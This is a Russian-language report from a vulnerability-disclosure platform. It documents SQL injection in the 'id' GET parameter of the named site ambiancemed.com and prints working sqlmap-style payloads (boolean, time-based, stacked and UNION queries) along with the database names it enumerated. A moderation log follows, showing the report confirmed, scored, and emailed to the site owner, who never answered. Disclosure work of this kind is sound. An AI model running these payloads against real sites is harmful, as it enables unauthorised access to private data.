SQL-инъекция

Ambiance Med 07 Декабрь 2016, 23:18

Подробная информация

Есть SQL инъекции на сайте.
Используя эту слабость возможно краст конфиденциальной информации с сайта (пароли, структура сайта и т.д.)
site: ambiancemed.com
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=7 AND 9525=9525

Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: id=7;SELECT SLEEP(5)#

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=7 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-6345 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767071,0x68644a6f727a6a4f624959496e595a767646416e6f47615864685351415061656f6f784d55455870,0x716b626271),NULL,NULL-- lBeb
---
available databases [2]:
[*] apteyfpx_amqiance
[*] information_wchema

Записи

  • 23 Январь 2017, 13:14
    Статус уязвимости
    Нет ответа от источника

  • 13 Декабрь 2016, 12:04
    Статус уязвимости
    Отправлено сообщение об уязвимости на электронный адрес источника

  • 13 Декабрь 2016, 11:15
    Статус уязвимости
    Подтверждено со стороны модератора

  • 13 Декабрь 2016, 11:01
    Статус уязвимости
    Отправлено сообщение об уязвимости на электронный адрес источника

  • 11 Декабрь 2016, 11:22
    Уязвимости присвоен балл
    Модератор присвоил 8 баллов из 10-и на уязвимости

  • 11 Декабрь 2016, 11:10
    Статус уязвимости
    Подтверждено со стороны модератора

  • 08 Декабрь 2016, 16:25
    Уязвимость изменена
    Уязвимость изменена

  • 08 Декабрь 2016, 12:17
    Уязвимость отказана
    Saytın ünvanını qeyd edin

  • 07 Декабрь 2016, 23:18
    Добавлена уязвимость
    Добавлена уязвимость на BUGemot